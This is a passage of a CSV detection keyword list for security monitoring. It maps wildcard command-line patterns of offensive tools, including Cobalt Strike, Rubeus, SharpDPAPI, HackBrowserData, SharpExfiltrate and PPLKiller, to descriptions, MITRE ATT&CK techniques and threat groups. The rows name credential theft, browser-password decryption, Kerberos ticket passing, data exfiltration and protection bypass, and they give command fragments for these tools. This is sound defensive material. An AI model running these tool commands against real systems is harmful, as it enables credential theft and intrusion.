TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*.bin -enc xor -lang csharp -k 2 -v nickvourd*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*.bin -enc xor -lang nim -k 4*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*.blog.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection 
controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.BruteRatel*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*.cobaltstrike*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*.cobaltstrike.beacon_keys*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*.com/dcsync/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*.com/SecureAuthCorp*,offensive_tool_keyword,Github Username,github repo hosting exploitation tools for pentesters,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/SecureAuthCorp,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.com/SpiderLabs*,offensive_tool_keyword,Github Username,github repo hosting exploitation tools adn documentation for pentesters,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/SpiderLabs,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.dev.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.doc.bat*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.doc.dll*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.doc.exe*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.doc.htm*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.doc.jar*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.doc.js*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - 
TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.doc.sfx*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.doc.vbs*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.docx.bat*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.docx.dll*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.docx.exe*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.docx.htm*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.docx.jar*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.docx.js*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.docx.sfx*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.docx.vbs*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.events.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt 
Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.exe --b64 --path * --args ,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,0,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*.exe certificates /pvk:*.pvk*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*.exe -group=remote -computername=*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. 
including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,fp risks,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe * /hide * /range:* /auto:*.*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*.exe * -eventlog *Key Management Service*,offensive_tool_keyword,cobaltstrike,Persistence by writing/reading shellcode from Event Log,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/improsec/SharpEventPersist,1,0,N/A,10,10,348,50,2022-05-27T14:52:02Z,2022-05-20T14:52:56Z -*.exe * --source Persistence*,offensive_tool_keyword,cobaltstrike,Persistence by writing/reading shellcode from Event Log,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/improsec/SharpEventPersist,1,0,N/A,10,10,348,50,2022-05-27T14:52:02Z,2022-05-20T14:52:56Z -*.exe *.bin -enc aes -lang csharp*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*.exe *-searchforest*-pwdlastset*,offensive_tool_keyword,Get-RBCD-Threaded,Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments,T1558 - T1208 - T1550 - T1484 - T1486,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/FatRodzianko/Get-RBCD-Threaded,1,0,N/A,N/A,2,115,19,2021-08-10T23:29:48Z,2019-12-21T00:08:28Z -*.exe 
/disableLSAProtection*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,0,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*.exe /method:create /taskname:* /trigger:* /modifier:* /program:* /argument:*.dll /remoteserver:*,offensive_tool_keyword,ScheduleRunner,A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation,T1210 T1570 T1021 T1550,TA0008,N/A,N/A,Persistence,https://github.com/netero1010/ScheduleRunner,1,0,N/A,N/A,3,299,42,2022-07-05T10:24:45Z,2021-10-12T15:27:32Z -*.exe /wakeall*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*.exe action=GetScheduledTaskCOMHandler*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*.exe action=ListRunningServices*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*.exe action=ListScheduledTasks*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation 
tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*.exe action=ListTaskNames*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*.exe --adcs * --remote *,offensive_tool_keyword,ADCSPwn,A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service,T1550.002 - T1078.003 - T1110.003,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bats3c/ADCSPwn,1,0,N/A,10,8,749,119,2023-03-20T20:30:40Z,2021-07-30T15:04:41Z -*.exe app /create /name:* /uncpath:*\\*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,0,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z -*.exe app /deploy /name:* /groupname:* /assignmentname:*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,0,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z -*.exe asktgt /user:* /aes256:* /opsec /ptt*,offensive_tool_keyword,AD exploitation cheat sheet,Lateral Movement with Rubeus More stealthy variant but requires the AES256 key (see 'Dumping OS credentials with Mimikatz' section),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe asktgt /user:* /rc4:* 
/createnetonly:*cmd.exe*,offensive_tool_keyword,AD exploitation cheat sheet,Lateral Movement with Rubeus Pass the ticket to a sacrificial hidden process. allowing you to e.g. steal the token from this process (requires elevation),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe asktgt /user:* /rc4:* /ptt*,offensive_tool_keyword,AD exploitation cheat sheet,Lateral Movement with Rubeus Request a TGT as the target user and pass it into the current session,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe AzureStorage --connectionstring * --filepath * --extensions *,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,0,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*.exe -b * -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default'*,offensive_tool_keyword,HackBrowserData,Decrypt passwords/cookies/history/bookmarks from the browser,T1555 - T1189 - T1217 - T1185,TA0002 - TA0009 - TA0001 - TA0010,N/A,N/A,Exploitation tools,https://github.com/moonD4rk/HackBrowserData,1,0,N/A,N/A,10,8729,1373,2023-10-02T14:38:41Z,2020-06-18T03:24:31Z -*.exe -b all -f json --dir results -cc*,offensive_tool_keyword,HackBrowserData,Decrypt passwords/cookies/history/bookmarks from the browser,T1555 - T1189 - T1217 - T1185,TA0002 - TA0009 - TA0001 - TA0010,N/A,N/A,Exploitation tools,https://github.com/moonD4rk/HackBrowserData,1,0,N/A,N/A,10,8729,1373,2023-10-02T14:38:41Z,2020-06-18T03:24:31Z -*.exe backupkey /nowrap *.pvk*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI 
functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*.exe certificates /mkfile:*.txt*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*.exe client *:* R:socks*,offensive_tool_keyword,AD exploitation cheat sheet,Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.,T1071 - T1090 - T1102,N/A,N/A,N/A,POST Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe compute --sid * --kdskey *,offensive_tool_keyword,GoldenGMSA,GolenGMSA tool for working with GMSA passwords,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/Semperis/GoldenGMSA,1,0,N/A,7,2,113,17,2023-07-03T09:35:48Z,2022-02-03T10:32:05Z -*.exe computername=* command=* username=* password=* nla=true*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,0,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*.exe computername=* command=* username=* password=* takeover=true*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,0,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*.exe computername=* command=* username=* 
password=* connectdrive=true*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,0,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*.exe computername=* command=* username=* password=* elevated=taskmgr*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,0,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*.exe computername=* command=* username=* password=* elevated=winr*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,0,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*.exe computername=* command=* username=* password=* exec=cmd*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,0,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*.exe create /payload* /kb*,offensive_tool_keyword,SharpWSUS,SharpWSUS is a CSharp tool for lateral movement through WSUS,T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/nettitude/SharpWSUS,1,0,N/A,N/A,5,408,63,2022-11-20T23:41:40Z,2022-05-04T08:27:57Z -*.exe credentials 